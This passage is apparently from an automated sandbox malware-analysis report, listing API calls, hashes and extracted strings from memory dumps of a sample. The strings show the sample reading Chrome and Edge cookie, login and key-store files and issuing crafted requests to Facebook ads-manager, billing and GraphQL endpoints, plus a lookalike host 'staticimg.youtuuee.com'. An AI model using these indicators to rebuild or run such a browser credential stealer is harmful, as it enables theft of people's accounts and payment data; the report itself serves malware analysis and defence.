                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 641f924ba7bc3869e0f6b117d50612a5925985570150c7013b002e106ee6a1a6
                                        • Instruction ID: 9583ced39277175aeec79b39128d2b234c84efb251ecccf4edc34c2dfa24dea5
                                        • Opcode Fuzzy Hash: 641f924ba7bc3869e0f6b117d50612a5925985570150c7013b002e106ee6a1a6
                                        • Instruction Fuzzy Hash: 5CC00274004645641F503EBE11223A91300F89779FB8430C0AD41D65435D4648EE6677
                                        APIs
                                          • Part of subcall function 00851050: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00864A84), ref: 00851053
                                          • Part of subcall function 00851050: GetLastError.KERNEL32(?,00000000,?,00864A84), ref: 0085105D
                                        • IsDebuggerPresent.KERNEL32(?,?,?,0085100A), ref: 00851FBC
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0085100A), ref: 00851FCB
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00851FC6
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 450123788-631824599
                                        • Opcode ID: e9c7f25e1851a7facd8ceed42385f904a9ca7ed52eb20823898cd92e07441c7d
                                        • Instruction ID: cb0d5d0942bb00451085e4111ab668c7ea231dfa7fc745fa9f013d50afab2d76
                                        • Opcode Fuzzy Hash: e9c7f25e1851a7facd8ceed42385f904a9ca7ed52eb20823898cd92e07441c7d
                                        • Instruction Fuzzy Hash: BCE0ED70204B518FDB619F69E4083567BE4FF04746F44886DEE56C3682EBB5D44C8B92
                                        APIs
                                        • WinHttpOpen.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D2EC3
                                        • WinHttpConnect.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D2F10
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3072
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3089
                                        • WinHttpSetOption.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D31AA
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D31C6
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D31E1
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D34DC
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D34F7
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D359D
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D35B8
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D35CD
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D35E8
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D35FD
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3618
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D362D
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3648
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D365D
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3678
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D368D
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D36A8
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D36BD
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D36D8
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D36ED
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3708
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D371D
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3738
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D374D
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3768
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3813
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D382E
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3843
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D385E
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3873
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D388E
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D38A3
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D38BE
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3969
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3984
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3999
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D39B4
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D39C9
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D39E4
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D39F9
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3A14
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3A29
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3A44
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3AEF
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B0A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B1F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B3A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B4F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B6A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B7F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3B9A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3BAF
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3BCA
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3BDF
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3BFA
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C0F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C2A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C3F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C5A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C6F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C8A
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3C9F
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3CBA
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3D65
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3D80
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3D95
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3DB0
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3DC5
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3DE0
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3DF5
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3E10
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3E25
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3E40
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3E55
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3E70
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3E85
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3EA0
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3EB5
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3ED0
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3EE5
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3F00
                                        • lstrlenW.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3F15
                                        • WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D3F30
                                          • Part of subcall function 00007FF72F5D2DB0: WinHttpQueryAuthSchemes.WINHTTP ref: 00007FF72F5D2DCE
                                        • WinHttpReceiveResponse.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4403
                                        • WinHttpQueryHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4435
                                        • WinHttpQueryHeaders.WINHTTP(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D447F
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D47FE
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D4804
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D480A
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4822
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D4852
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D486A
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D48AC
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D48EE
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4930
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4972
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D49B4
                                          • Part of subcall function 00007FF72F5D64F0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D65D3
                                          • Part of subcall function 00007FF72F5D64F0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF72F5D65D9
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D4AEC
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4B04
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4B46
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4B88
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4BCA
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D4BFA
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4C12
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4C54
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4C96
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4CD8
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D4D4A
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4D62
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4DA4
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4DE6
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4E28
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4E6A
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4EAC
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4EEE
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D4F30
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D51CA
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D520C
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D524E
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D5290
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72F5D52C0
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D52D8
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D531A
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D535C
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D539E
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D53E0
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D5422
                                        • GetLastError.KERNEL32(?,00000000,00000005,00000000,00000001,?,00000000,00007FF72F5C2B67), ref: 00007FF72F5D5464
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1994418947.00007FF72F5C1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FF72F5C0000, based on PE: true
                                        • Associated: 00000013.00000002.1994356665.00007FF72F5C0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994809063.00007FF72F702000.00000004.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1995102259.00007FF72F712000.00000002.00000001.01000000.00000011.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ff72f5c0000_Mon17c604381c7047e.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Http$Headers$Requestlstrlen$ErrorLast$_invalid_parameter_noinfo_noreturn$Query$AuthConcurrency::cancel_current_taskConnectOpenOptionReceiveResponseSchemes
                                        • String ID: -$/ads/manager/account_settings/account_billing$/adsmanager/creation?act=$/api/graphql/$/www.facebook.com/$Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.$Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.$Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.$Accept: */*$Accept: */*$Accept: */*$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0$Connection: keep-alive$Connection: keep-alive$Content-Type: application/x-www-form-urlencoded$Content-type: application/x-www-form-urlencoded$Error (WinHttpAddRequestHeaders)$Error (WinHttpSetOption)$GET$Host: www.facebook.com$Host: www.facebook.com$Origin: https://www.facebook.com$Origin: https://www.facebook.com$Origin: https://www.facebook.com$Origin: https://www.facebook.com$POST$Referer: https://www.facebook.com/$Referer: https://www.facebook.com/$Sec-Fetch-Dest: document$Sec-Fetch-Dest: document$Sec-Fetch-Dest: document$Sec-Fetch-Dest: document$Sec-Fetch-Dest: document$Sec-Fetch-Dest: empty$Sec-Fetch-Dest: empty$Sec-Fetch-Dest: empty$Sec-Fetch-Mode: cors$Sec-Fetch-Mode: cors$Sec-Fetch-Mode: cors$Sec-Fetch-Mode: navigate$Sec-Fetch-Mode: navigate$Sec-Fetch-Mode: navigate$Sec-Fetch-Mode: navigate$Sec-Fetch-Mode: navigate$Sec-Fetch-Site: none$Sec-Fetch-Site: none$Sec-Fetch-Site: none$Sec-Fetch-Site: same-origin$Sec-Fetch-Site: same-origin$Sec-Fetch-Site: same-origin$Sec-Fetch-Site: same-origin$Sec-Fetch-Site: same-site$Sec-Fetch-User: ?1$Sec-Fetch-User: ?1$Sec-Fetch-User: ?1$Upgrade-Insecure-Requests: 1$Upgrade-Insecure-Requests: 1$Upgrade-Insecure-Requests: 1$Upgrade-Insecure-Requests: 1$Upgrade-Insecure-Requests: 1$X-FB-Friendly-Name: BillingAMNexusRootQuery$X-FB-Friendly-Name: BillingTransactionTableQuery$api/graphql/?lll=ppp$http://staticimg.youtuuee.com/$https://www.facebook.com/$login/device-based/login$login/device-based/login$manager/account_settings/account_billing$pages/?category=your_pages$primary_location/info$profile.php$sec-ch-ua-mobile: ?0$sec-ch-ua-mobile: ?0$sec-ch-ua: " Not;A Brand";v="99", "Microsoft Edge";v="91", "Chromium";v="91"$sec-ch-ua: " Not;A Brand";v="99", "Microsoft Edge";v="91", "Chromium";v="91"$v10.0/act_$viewport-width: 1920$viewport-width: 1920
                                        • API String ID: 2490173491-420276689
                                        • Opcode ID: 5be8e1d1bd298a71d1af7ef2746d2fc86b09a4dfed30462034d4a02046d4cad9
                                        • Instruction ID: 5b687cae87f81de7897f35c74f4c9559ed91acd7c9bbb37651cff75e3fcef7fd
                                        • Opcode Fuzzy Hash: 5be8e1d1bd298a71d1af7ef2746d2fc86b09a4dfed30462034d4a02046d4cad9
                                        • Instruction Fuzzy Hash: E6235F22B299C291EB10FB15EC546F9A366FF81780FC05132D99E43AA9DF2DD549CF20
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1994418947.00007FF72F5C1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FF72F5C0000, based on PE: true
                                        • Associated: 00000013.00000002.1994356665.00007FF72F5C0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994809063.00007FF72F702000.00000004.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1995102259.00007FF72F712000.00000002.00000001.01000000.00000011.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ff72f5c0000_Mon17c604381c7047e.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$AttributesFile$Concurrency::cancel_current_task$FolderPath
                                        • String ID: "$\Cookies$\Cookies$\Google\Chrome\User Data\Default\Cookies$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Google\Chrome\User Data\Profile $\Google\Chrome\User Data\Profile $\Login Data$\Login Data$\Microsoft\Edge\User Data\Default\Cookies$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Microsoft\Edge\User Data\Profile $\Microsoft\Edge\User Data\Profile $action_url$cookies$cookies$cookies$cookies$facebook.com$facebook.com$host_key$login$login$login$login$origin_url$state$state$state$state
                                        • API String ID: 2211593764-2496850475
                                        • Opcode ID: fe3381858fa7bd5d452d258ce4732713b2fe3803a7ac582883b4252d94ad68ad
                                        • Instruction ID: 9a7e883807a71f74a65522d2acda269e54a4d782211c7ed71efa79ac58190d83
                                        • Opcode Fuzzy Hash: fe3381858fa7bd5d452d258ce4732713b2fe3803a7ac582883b4252d94ad68ad
                                        • Instruction Fuzzy Hash: 0703D122B28AC685EB00EF64D8403EDA376FB81798F805236EA5D17AD9DF7CD545CB10

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
